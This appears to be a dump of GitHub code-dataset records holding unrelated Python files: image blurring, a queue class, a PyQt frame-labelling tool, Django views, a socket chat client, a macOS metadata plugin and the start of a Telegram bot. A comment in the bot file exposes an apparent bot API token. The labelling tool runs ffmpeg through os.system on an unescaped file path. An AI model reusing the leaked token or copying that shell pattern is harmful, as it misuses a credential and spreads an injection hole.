truncate=truncate, mode='constant').astype('float32')\n\n\ndef _gauss_blur_tensor(img_batch, kernel, img_batch_dim, k_size):\n blur_gauss_kernel = tf.stack([kernel, kernel, kernel])\n blur_gauss_kernel_4d = tf.reshape(blur_gauss_kernel, (k_size, k_size, img_batch_dim[3], 1))\n output = tf.nn.depthwise_conv2d(img_batch,\n blur_gauss_kernel_4d,\n strides=[1, 1, 1, 1],\n padding='SAME')\n output = tf.reshape(output, [img_batch_dim[0], img_batch_dim[1], img_batch_dim[2], img_batch_dim[3]])\n # print('blur %f' % kernel[1, 1])\n return output\n\n\ndef _gauss_blur(img_batch, sigma, truncate=2):\n return np.array([gaussian_filter(image, (sigma, sigma, 0), truncate=truncate, mode='constant').astype('float32')\n for image in img_batch])\n","repo_name":"alex-sage/logo-gen","sub_path":"dcgan/gauss.py","file_name":"gauss.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"53"} +{"seq_id":"31263625232","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Queue:\n def __init__(self):\n self.front = None\n self.rear = None\n self.count = 0\n\n def enqueue(self, value):\n if self.rear is None:\n self.front = self.rear = value\n self.count += 1\n else:\n self.rear.next = value\n self.rear = value\n self.count += 1\n\n def dequeue(self):\n if Queue.isEmpty(self):\n print(\"Queue is empty, Nothing to dequeue!!\")\n else:\n if self.front is None:\n self.front = None\n else:\n self.front = self.front.next\n self.count -= 1\n\n def isEmpty(self):\n if self.rear is None:\n return True\n else:\n return False\n\n def size(self):\n if self.count <= 0:\n print(\"queue is empty!!\")\n return self.count\n\n def traverse(self):\n if self.count == 0:\n print(\"Queue is empty!!\")\n else:\n curNode = self.front\n while curNode is not None:\n print(curNode.data)\n curNode = curNode.next\n","repo_name":"ravindraindia4u/Python","sub_path":"Data_Structure_Programs/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37521581992","text":"import os, sys, time, typing\nfrom datetime import datetime\nfrom PIL import ImageFont, ImageDraw, Image\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QPushButton,\n QHBoxLayout, QVBoxLayout, QLabel, QFileDialog, QLineEdit,\n QScrollArea, QComboBox, QTextEdit)\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QPixmap, QIntValidator\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\n\n\nclass ThreadWorker(QThread):\n sig = pyqtSignal()\n\n def __init__(self, filepath) -> None:\n super().__init__()\n self.filepath = filepath\n self.root = \"/home/milk/视频/material-epg/zdk\"\n\n def run(self):\n filename = self.filepath.split(\"/\")[-1].split(\".\")[0]\n dirpath = f\"{self.root}/videos/\"\n command = f'mkdir {dirpath}{filename};ffmpeg -y -i {dirpath}{filename}.mp4 -f image2 -r 25 -q:v 2 {dirpath}{filename}/%d.jpg;ffmpeg -y -i {dirpath}{filename}.mp4 -vf \"fps=1/5,scale=iw/4:-1,tile=8x90\" {dirpath}{filename}.jpg'\n os.system(command)\n # self.framing(f\"{dirpath}{filename}.jpg\")\n self.sig.emit()\n\n def framing(self, fileName):\n image = Image.open(fileName)\n width, height = image.size\n perw = width / 8\n perh = height / 90\n font = ImageFont.truetype(\"Pillow/Tests/fonts/FreeMono.ttf\", 50)\n draw = ImageDraw.Draw(image)\n for i in range(8):\n for j in range(90):\n draw.text((i*perw, j*perh), str((i*5+j*5*8)*25+63), font=font, fill=\"#a20808\")\n image.save(\"%s/2-%s\"%(fileName.rsplit(\"/\", 1)[0], fileName.rsplit(\"/\", 1)[1]))\n\n\nclass MainScroll(QScrollArea):\n sig = pyqtSignal(float)\n\n def __init__(self, parent: typing.Optional[QWidget] = ...) -> None:\n super().__init__(parent)\n\n def mousePressEvent(self, a0: QtGui.QMouseEvent) -> None:\n if a0.buttons() == Qt.MouseButton.LeftButton:\n height, width = self.children()[0].children()[0].height(), self.children()[0].children()[0].width()\n per_x, per_y = width / 8, height / 90\n if width > 100:\n cx, cy = a0.localPos().x(), self.verticalScrollBar().value() + a0.localPos().y()\n px, py = cx // per_x, cy // per_y\n pidx = (px * 5 + py * 5 * 8) *25 + 63\n self.sig.emit(pidx)\n return super().mousePressEvent(a0)\n\n\nclass ClickLabel(QLabel):\n sig = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.buttons() == Qt.MouseButton.LeftButton:\n self.sig.emit(self.filename)\n return super().mousePressEvent(ev)\n\n def setPixmap(self, a0: QtGui.QPixmap, filename: str) -> None:\n self.filename = filename\n return super().setPixmap(a0)\n\n\nclass ClickLabel2(QLabel):\n sig = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.buttons() == Qt.MouseButton.LeftButton:\n self.sig.emit(self.filename)\n return super().mousePressEvent(ev)\n\n def setPixmap(self, a0: QtGui.QPixmap, filename: str) -> None:\n self.filename = filename\n return super().setPixmap(a0)\n\n\nclass ClickLabel3(QLabel):\n sig = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.buttons() == Qt.MouseButton.LeftButton:\n self.sig.emit(self.filename)\n return super().mousePressEvent(ev)\n\n def setPixmap(self, a0: QtGui.QPixmap, filename: str) -> None:\n self.filename = filename\n return super().setPixmap(a0)\n\n\nclass DataLabel(QLabel):\n\n def __init__(self, dot, name, parent=None):\n self.dot = dot\n self.name = name\n super().__init__(parent)\n\n\nclass EnterLineEdit(QLineEdit):\n jump = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:\n if a0.key() == Qt.Key.Key_Return:\n self.jump.emit()\n return super().keyPressEvent(a0)\n\n\nclass Window(QWidget):\n\n def __init__(self):\n super().__init__()\n self.root = \"/home/milk/视频/material-epg/zdk\"\n self.piclist = []\n self.picdir = \"\"\n self.file = \"\"\n self.datalist = []\n self.nameList = []\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(\"demo\")\n self.resize(2200, 1000)\n\n self.button1 = QPushButton(\"视频分帧\", self)\n self.button1.setGeometry(20, 10, 90, 30)\n self.button1.clicked.connect(self.openFile)\n self.button2 = QPushButton(\"选择图片文件夹\", self)\n self.button2.setGeometry(20, 50, 120, 30)\n self.button2.clicked.connect(self.openDir)\n self.button3 = QPushButton(\"跳转\", self)\n self.button3.setGeometry(300, 50, 50, 30)\n self.button3.clicked.connect(self.jumpPage)\n\n self.label1 = QLabel(self)\n self.label1.move(120, 15)\n self.label2 = QLabel(self)\n self.label2.move(600, 15)\n self.plabel = QLabel(self)\n self.plabel.move(1460, 90)\n self.plabel2 = QLabel(self)\n\n self.flabel1 = ClickLabel(self)\n self.flabel1.move(10, 780)\n self.flabel1.sig.connect(self.setPicH)\n self.flabel2 = ClickLabel(self)\n self.flabel2.move(10+370, 780)\n self.flabel2.sig.connect(self.setPicH)\n self.flabel3 = ClickLabel(self)\n self.flabel3.move(10+370*2, 780)\n self.flabel3.sig.connect(self.setPicH)\n self.flabel4 = ClickLabel(self)\n self.flabel4.move(10+370*3, 780)\n self.flabel4.sig.connect(self.setPicH)\n self.flabel5 = ClickLabel(self)\n self.flabel5.move(10+370*4, 780)\n self.flabel5.sig.connect(self.setPicH)\n\n self.hlabel1 = ClickLabel2(self)\n self.hlabel1.move(10, 780+210)\n self.hlabel1.sig.connect(self.setPicG)\n self.hlabel2 = ClickLabel2(self)\n self.hlabel2.move(10+370, 780+210)\n self.hlabel2.sig.connect(self.setPicG)\n self.hlabel3 = ClickLabel2(self)\n self.hlabel3.move(10+370*2, 780+210)\n self.hlabel3.sig.connect(self.setPicG)\n self.hlabel4 = ClickLabel2(self)\n self.hlabel4.move(10+370*3, 780+210)\n self.hlabel4.sig.connect(self.setPicG)\n self.hlabel5 = ClickLabel2(self)\n self.hlabel5.move(10+370*4, 780+210)\n self.hlabel5.sig.connect(self.setPicG)\n\n self.glabel1 = ClickLabel3(self)\n self.glabel1.move(10, 780+210*2)\n self.glabel1.sig.connect(self.setPicR)\n self.glabel2 = ClickLabel3(self)\n self.glabel2.move(10+370, 780+210*2)\n self.glabel2.sig.connect(self.setPicR)\n self.glabel3 = ClickLabel3(self)\n self.glabel3.move(10+370*2, 780+210*2)\n self.glabel3.sig.connect(self.setPicR)\n self.glabel4 = ClickLabel3(self)\n self.glabel4.move(10+370*3, 780+210*2)\n self.glabel4.sig.connect(self.setPicR)\n self.glabel5 = ClickLabel3(self)\n self.glabel5.move(10+370*4, 780+210*2)\n self.glabel5.sig.connect(self.setPicR)\n\n self.textbox = EnterLineEdit(self)\n self.textbox.setGeometry(160, 50, 120, 30)\n self.textbox.setValidator(QIntValidator())\n self.textbox.jump.connect(self.jumpPage)\n\n self.mscroll = MainScroll(self)\n self.mscroll.setWidget(self.plabel2)\n self.mscroll.setGeometry(10, 90, 1440, 680)\n self.mscroll.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n # scroll.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n self.mscroll.sig.connect(self.setPicF)\n\n win1 = QWidget(self)\n vbox = QVBoxLayout(win1)\n hbox = QHBoxLayout()\n self.vbox2 = QVBoxLayout()\n self.textwin = QTextEdit()\n self.textwin.setReadOnly(True)\n self.vbox2.addWidget(self.textwin)\n # self.vbox2.addStretch(1)\n self.slabel = QLabel(\"\")\n self.tbutton = QPushButton(\"确定\")\n self.tbutton.clicked.connect(self.addEle)\n self.combo = QComboBox()\n self.combo.addItems(self.nameList)\n self.combo.setEditable(True)\n self.combo.setCurrentText(\"\")\n hbox.addWidget(self.slabel)\n hbox.addWidget(self.combo)\n # hbox.addStretch(1)\n hbox.addWidget(self.tbutton)\n # hbox.setStretch(0, 2)\n hbox.setStretch(1, 16)\n hbox.setStretch(2, 4)\n # hbox.addStretch(2)\n vbox.addLayout(hbox)\n vbox.addLayout(self.vbox2)\n vbox.addStretch(1)\n vbox.setStretch(0, 1)\n vbox.setStretch(1, 9)\n # vbox.addWidget(self.slabel, 1, Qt.AlignmentFlag.AlignLeft | Qt.AlignmentFlag.AlignTop)\n # vbox.addWidget(combo)\n # vbox.addWidget(button, 1, Qt.AlignmentFlag.AlignRight | Qt.AlignmentFlag.AlignBottom)\n win1.setGeometry(10+370*5, 780, 400, 600)\n # win1.setStyleSheet(\"border: 1px solid black;\")\n\n self.show()\n\n def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:\n if not self.file:\n return super().keyPressEvent(a0)\n if a0.key() == Qt.Key.Key_D:\n index = self.piclist.index(self.file)\n self.file = self.piclist[index+1]\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n self.setWindowTitle(self.file)\n if a0.key() == Qt.Key.Key_S:\n index = self.piclist.index(self.file)\n self.file = self.piclist[index-1]\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n self.setWindowTitle(self.file)\n if a0.key() == Qt.Key.Key_C:\n clipboard = QApplication.clipboard()\n clipboard.setText(self.file.split(\".\")[0])\n return super().keyPressEvent(a0)\n\n def jumpPage(self):\n self.textbox.clearFocus()\n filename = self.textbox.text()\n # self.textbox.clear()\n if not filename:\n filename = \"1\"\n self.file = f\"{filename}.jpg\"\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n\n self.setWindowTitle(self.file)\n\n def addEle(self):\n self.datalist.append((self.file.split(\".\")[0], self.combo.currentText()))\n if self.combo.currentText() not in self.nameList:\n self.nameList.append(self.combo.currentText())\n self.combo.addItem(self.combo.currentText())\n self.textwin.setText(\"\\n\".join([\"%s %s\"%ele for ele in self.datalist]))\n\n\n def openFile(self):\n filepath, _ = QFileDialog.getOpenFileName(self, \"选取视频文件\", self.root, \"*.mp4\")\n if not filepath:\n return\n self.label1.setText(filepath)\n self.label1.adjustSize()\n self.thread = ThreadWorker(filepath)\n self.thread.sig.connect(self.handleFinish)\n self.thread.start()\n\n def handleFinish(self):\n self.label2.setText(\"完成\")\n self.label2.adjustSize()\n\n def setPicF(self, pidx):\n self.file = f\"{int(pidx)}.jpg\"\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n\n fpixmap1 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-100]))\n self.flabel1.setPixmap(fpixmap1.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-100])\n self.flabel1.adjustSize()\n fpixmap2 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-75]))\n self.flabel2.setPixmap(fpixmap2.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-75])\n self.flabel2.adjustSize()\n fpixmap3 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-50]))\n self.flabel3.setPixmap(fpixmap3.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-50])\n self.flabel3.adjustSize()\n fpixmap4 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-25]))\n self.flabel4.setPixmap(fpixmap4.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-25])\n self.flabel4.adjustSize()\n fpixmap5 = QPixmap(os.path.join(self.picdir, self.file))\n self.flabel5.setPixmap(fpixmap5.scaledToHeight(200), self.file)\n self.flabel5.adjustSize()\n\n self.setWindowTitle(self.file)\n\n def setPicH(self, filename):\n self.file = filename\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n \n hpixmap1 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-20]))\n self.hlabel1.setPixmap(hpixmap1.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-20])\n self.hlabel1.adjustSize()\n hpixmap2 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-15]))\n self.hlabel2.setPixmap(hpixmap2.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-15])\n self.hlabel2.adjustSize()\n hpixmap3 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-10]))\n self.hlabel3.setPixmap(hpixmap3.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-10])\n self.hlabel3.adjustSize()\n hpixmap4 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-5]))\n self.hlabel4.setPixmap(hpixmap4.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-5])\n self.hlabel4.adjustSize()\n hpixmap5 = QPixmap(os.path.join(self.picdir, self.file))\n self.hlabel5.setPixmap(hpixmap5.scaledToHeight(200), self.file)\n self.hlabel5.adjustSize()\n\n self.setWindowTitle(self.file)\n\n def setPicG(self, filename):\n self.file = filename\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n \n gpixmap1 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-4]))\n self.glabel1.setPixmap(gpixmap1.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-4])\n self.glabel1.adjustSize()\n gpixmap2 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-3]))\n self.glabel2.setPixmap(gpixmap2.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-3])\n self.glabel2.adjustSize()\n gpixmap3 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-2]))\n self.glabel3.setPixmap(gpixmap3.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-2])\n self.glabel3.adjustSize()\n gpixmap4 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-1]))\n self.glabel4.setPixmap(gpixmap4.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-1])\n self.glabel4.adjustSize()\n gpixmap5 = QPixmap(os.path.join(self.picdir, self.file))\n self.glabel5.setPixmap(gpixmap5.scaledToHeight(200), self.file)\n self.glabel5.adjustSize()\n\n self.setWindowTitle(self.file)\n\n def setPicR(self, filename):\n self.file = filename\n framenum = filename.split(\".\")[0]\n dot = datetime.strptime(\"2022-10-15 02:59:35\", \"%Y-%m-%d %H:%M:%S\").timestamp() + round(int(framenum)/25, 2)\n dtime = datetime.fromtimestamp(dot).strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-4]\n self.slabel.setText(dtime)\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n\n self.setWindowTitle(self.file)\n\n def openDir(self):\n self.picdir = QFileDialog.getExistingDirectory(self, \"选取图片文件夹\", self.root)\n if not self.picdir:\n return\n self.piclist = os.listdir(self.picdir)\n self.piclist.sort(key=lambda x: int(x.split(\".\")[0]))\n self.file = self.piclist[0]\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n self.plabel.adjustSize()\n\n pixmap2 = QPixmap(\"%s/%s.jpg\"%(self.picdir.rsplit(\"/\", 1)[0], self.picdir.rsplit(\"/\", 1)[1]))\n self.plabel2.setPixmap(pixmap2.scaledToWidth(1440))\n self.plabel2.adjustSize()\n\n self.mscroll.verticalScrollBar().setValue(0)\n self.setWindowTitle(self.file)\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = Window()\n sys.exit(app.exec_())\n","repo_name":"PapayaMilk/EpgLabelTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70020283048","text":"from django.shortcuts import render\nimport random\n\n# Create your views here.\ndef index(request): \n return render(request, \"index.html\")\n\n\ndef today_dinner(request):\n dinner_list = [\n {\"name\": \"salad\", \"src\": \"https://www.licious.in/blog/wp-content/uploads/2020/12/3-Step-Chicken-Salad.jpg\"},\n {\"name\": \"steak\", \"src\": \"https://natashaskitchen.com/wp-content/uploads/2020/03/Pan-Seared-Steak-4.jpg\"},\n {\"name\": \"pasta\", \"src\": \"https://hips.hearstapps.com/hmg-prod.s3.amazonaws.com/images/delish-bucatinipasta-045-ls-1607552701.jpg\"},\n ]\n \n dinner = random.choice(dinner_list)\n context = {\n \"dinner\" : dinner\n }\n \n return render(request, \"today_dinner.html\", context)\n\n\ndef lotto(request):\n # 1부터 46사이의 숫자를 6개 뽑는다\n # 로또 번호 6개를 5번 뽑기\n lotto_list = []\n\n '''\n lotto_result_list = [\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n ]\n ''' \n\n for _ in range(5):\n lotto = random.sample(range(1, 46),6)\n lotto_list.append(lotto)\n \n context = {\n \"lotto_list\": lotto_list,\n }\n return render(request, \"lotto.html\", context)\n\n\n","repo_name":"astroastrum/Django","sub_path":"tb_1010/random_game/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23147685417","text":"import socket\r\nimport threading\r\nimport json\r\nfrom cmd import Cmd\r\n\r\nclass Client(Cmd):\r\n prompt = ''\r\n intro = 'Welcome to my chatroom\\n' + '\\help you for use program \\n'\r\n\r\n def __init__(self):\r\n \r\n super().__init__()\r\n self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.__id = None\r\n self.__nickname = None\r\n\r\n def __receive_message_thread(self):\r\n \"\"\"\r\n Accept message thread\r\n \"\"\"\r\n while True:\r\n # noinspection PyBroadException\r\n try:\r\n buffer = self.__socket.recv(1024).decode()\r\n obj = json.loads(buffer)\r\n m=''\r\n\r\n if ((obj['number_message'] > 0 or obj['bo'] == True) and obj['po']==False):\r\n print('public message from '+str(obj['sender_nickname'])+',length='+str(obj['number_message'])+'\\r\\n'+obj['message'])\r\n elif obj['number_message'] > 0 and obj['bo']==False and obj['po']==True:\r\n for i in obj['list_mem']:\r\n m+=str(i)+', '\r\n private_message='private message, length='+str(obj['number_message'])+' from '+ str(obj['sender_nickname'])+' to '+ m + ':\\r\\n'+str(obj['message'])\r\n print(private_message)\r\n else:\r\n print(obj['message'])\r\n\r\n except Exception:\r\n print('[Client] has error')\r\n\r\n def __send_message_thread(self, message,bo,number_message,list_mem,po=False):\r\n \"\"\"\r\n :param message\r\n \"\"\"\r\n self.__socket.send(json.dumps({\r\n 'type': 'broadcast',\r\n 'bo':bo,\r\n 'po':po,\r\n 'list_mem':list_mem,\r\n 'number_message':number_message,\r\n 'sender_id': self.__id,\r\n 'message': message\r\n }).encode())\r\n\r\n def start(self):\r\n \"\"\"\r\n Start the client\r\n \"\"\"\r\n self.__socket.connect(('127.0.0.1', 8888))\r\n self.cmdloop()\r\n\r\n def do_Bye(self,args):\r\n self.__socket.send(json.dumps({\r\n 'type': 'Bye',\r\n 'nickname': self.__nickname,\r\n 'id':self.__id\r\n }).encode())\r\n\r\n\r\n\r\n\r\n def do_Hello(self, args):\r\n \"\"\"\r\n :param args\r\n \"\"\"\r\n nickname = args.split(' ')[0]\r\n\r\n # Send the nickname to the server to get the user id\r\n self.__socket.send(json.dumps({\r\n 'type': 'Hello',\r\n 'nickname': nickname\r\n }).encode())\r\n # Try to accept data\r\n # noinspection PyBroadException\r\n\r\n try:\r\n buffer = self.__socket.recv(1024).decode()\r\n obj = json.loads(buffer)\r\n if obj['id']:\r\n self.__nickname = nickname\r\n self.__id = obj['id']\r\n\r\n # Open the child thread for receiving data\r\n thread = threading.Thread(target=self.__receive_message_thread)\r\n thread.setDaemon(True)\r\n thread.start()\r\n print('Hi ' + str(nickname) + ' welcome to the chat room')\r\n else:\r\n print('[Client] Can not log in to chat room')\r\n except Exception:\r\n print('[Client] Unable to get data from the server')\r\n\r\n def do_send(self, args):\r\n \"\"\"\r\n :param args\r\n \"\"\"\r\n message = args\r\n last=len(message)-1\r\n number = ''\r\n number_message=0\r\n lines=[]\r\n bo=False\r\n po=False\r\n number2=0\r\n member_private=''\r\n list_mem=[]\r\n\r\n if message =='please send the list of attendees':\r\n bo=False\r\n elif message[last]==':' and message[22]=='=':\r\n bo=True\r\n for i in range(len(message)):\r\n if i>=23 and i0:\r\n line=input()\r\n if line and number_message> 0:\r\n number_message=number_message - len(line)\r\n lines.append(line)\r\n else:\r\n break\r\n message='\\n'.join(lines)\r\n elif message[last]==':' and message[23]=='=':\r\n bo = False\r\n po=True\r\n to=int(message.index('to'))-1\r\n for i in range(len(message)):\r\n if i >= 24 and i < to:\r\n number += message[i]\r\n\r\n number_message = int(number)\r\n number2 = int(number)\r\n for i in range(len(message)):\r\n if i > to+3 and i < last:\r\n member_private += message[i]\r\n\r\n\r\n list_mem=member_private.split(',')\r\n\r\n while number_message > 0:\r\n line = input()\r\n if line and number_message > 0:\r\n number_message = number_message - len(line)\r\n lines.append(line)\r\n else:\r\n break\r\n message = '\\n'.join(lines)\r\n\r\n else:\r\n bo=True\r\n\r\n\r\n # Open the child thread for sending data\r\n thread = threading.Thread(target=self.__send_message_thread, args=(message,bo,number2,list_mem,po ))\r\n thread.setDaemon(True)\r\n thread.start()\r\n\r\n def do_help(self, arg):\r\n \"\"\"\r\n :param arg\r\n \"\"\"\r\n command = arg.split(' ')[0]\r\n if command == '':\r\n print('[Help] Hello nickname - Log in to the chat room, nickname is your chosen nickname')\r\n print('you can write <> for login in to chat room ')\r\n print('and <> send message for users\\nand <> for left the chat room')\r\n elif command == 'Hello':\r\n print('[Help] Hello nickname -Log in to the chat room, nickname is your chosen nickname')\r\n elif command == 'send':\r\n print('[Help] send message - send public or private message for user')\r\n print('for public message you should write <:\\n')\r\n print('for private message you should write < to ,,...:')\r\n print('for show you member list you should write <>')\r\n else:\r\n print('[Help] Did not find the instruction you want to know')\r\n","repo_name":"mehran1421/python-library","sub_path":"it_proj/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42270575307","text":"\"\"\"exiftool template plugin for autofile\"\"\"\n\nfrom __future__ import annotations\n\nimport datetime\nfrom typing import Iterable\n\nimport mdinfo\nimport osxmetadata\nfrom osxmetadata import (\n MDIMPORTER_ATTRIBUTE_DATA,\n MDITEM_ATTRIBUTE_DATA,\n NSURL_RESOURCE_KEY_DATA,\n _kFinderColor,\n _kFinderInfo,\n _kFinderStationeryPad,\n _kMDItemUserTags,\n)\n\nALL_ATTRIBUTES = {\n *list(MDITEM_ATTRIBUTE_DATA.keys()),\n *list(NSURL_RESOURCE_KEY_DATA.keys()),\n *list(MDIMPORTER_ATTRIBUTE_DATA.keys()),\n _kFinderColor,\n _kFinderInfo,\n _kFinderStationeryPad,\n _kMDItemUserTags,\n}\n\nFIELDS = {\"{mac}\": \"Format: '{mac:SUBFIELD}'\"}\n\nDATETIME_ATTRIBUTES = {\n \"date\": \"ISO date, e.g. 2020-03-22\",\n \"year\": \"4-digit year, e.g. 2021\",\n \"yy\": \"2-digit year, e.g. 21\",\n \"month\": \"Month name as locale's full name, e.g. December\",\n \"mon\": \"Month as locale's abbreviated name, e.g. Dec\",\n \"mm\": \"2-digit month, e.g. 12\",\n \"dd\": \"2-digit day of the month, e.g. 22\",\n \"dow\": \"Day of the week as locale's full name, e.g. Tuesday\",\n \"doy\": \"Julian day of year starting from 001\",\n \"hour\": \"2-digit hour, e.g. 10\",\n \"min\": \"2-digit minute, e.g. 15\",\n \"sec\": \"2-digit second, e.g. 30\",\n \"strftime\": \"Apply strftime template to date/time. Should be used in form \"\n + \"{created.strftime,TEMPLATE} where TEMPLATE is a valid strftime template, e.g. \"\n + \"{created.strftime,%Y-%U} would result in year-week number of year: '2020-23'. \"\n + \"If used with no template will return null value. \"\n + \"See https://strftime.org/ for help on strftime templates.\",\n}\n\nDATETIME_SUBFIELDS = list(DATETIME_ATTRIBUTES.keys())\n\n\n@mdinfo.hookimpl\ndef get_template_help() -> Iterable:\n \"\"\"Specify help text for your plugin; will get displayed with mdinfo --help\n Returns:\n Iterable (e.g. list) of help text as str or list of lists\n str items may be formatted with markdown\n list of lists items can be used for definition lists (e.g. [[key1, value1], [key2, value2]])\n \"\"\"\n\n text = \"\"\"\n The `{mac}` template provides access to a wide range of macOS specific metadata fields\n including all Spotlight metadata fields. \n\n The following attributes are supported:\n\n \"\"\"\n\n text += \", \".join(sorted(ALL_ATTRIBUTES))\n text += \"\\n\"\n\n fields = [[\"Field\", \"Description\"], *[[k, v] for k, v in FIELDS.items()]]\n # attributes = [\n # [\"Attribute\", \"Description\"],\n # *[[k, v] for k, v in DATETIME_ATTRIBUTES.items()],\n # ]\n # return [\"**MacOS Specific Metadata**\", fields, text, attributes]\n return [\"**MacOS Specific Metadata**\", fields, text]\n\n\n@mdinfo.hookimpl\ndef get_template_value(\n filepath: str, field: str, subfield: str, default: list[str]\n) -> list[str | None] | None:\n \"\"\"Lookup value for {mac} template field.\n\n Args:\n filepath: path to the file being processed\n field: template field to find value for\n subfield: the subfield provided, if any (e.g. {field:subfield})\n field_arg: the field argument provided, if any (e.g. {field(arg)})\n default: the default value provided to the template, if any (e.g. {field,default})\n\n Returns:\n The matching template value (which may be None) as a list or None if template field is not handled.\n\n Raises:\n ValueError: if the template is not correctly formatted (e.g. plugin expected a subfield but none provided)\n \"\"\"\n if \"{\" + field + \"}\" not in FIELDS:\n return None\n\n if subfield not in ALL_ATTRIBUTES:\n raise ValueError(f\"Invalid subfield '{subfield}' for {field} template\")\n\n metadata = osxmetadata.OSXMetaData(filepath)\n value = metadata.get(subfield)\n if not isinstance(value, list):\n value = [value]\n value = [str(v) for v in value]\n return value\n","repo_name":"RhetTbull/mdinfo_macos","sub_path":"mdinfo_macos/mdinfo_mac.py","file_name":"mdinfo_mac.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14722925522","text":"# basic telegram bot\n# https://www.codementor.io/garethdwyer/building-a-telegram-bot-using-python-part-1-goi5fncay\n# https://github.com/sixhobbits/python-telegram-tutorial/blob/master/part1/echobot.py\n\nimport json\nimport requests\nimport time\nimport urllib\nimport random\nfrom DBhelper import DBHelper\nimport numpy as np\nfrom config import TOKEN\n\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\ndb = DBHelper()\n\n\"\"\"\nUseful commands:\nlink to bot: https://api.telegram.org/bot556283248:AAGId4tLael98vEfBuJoW1DviS5Pv2bIi2Q/getme\nHow to get the last text message:\nprint(get_last_chat_id_and_text(updates)[0])\nUseful information:\nThe Dictionary has 268973 entries.\n\"\"\"\n\n\ndef get_url(url):\n response = requests.get(url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = get_url(url)\n js = json.loads(content)\n return js\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=100\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = 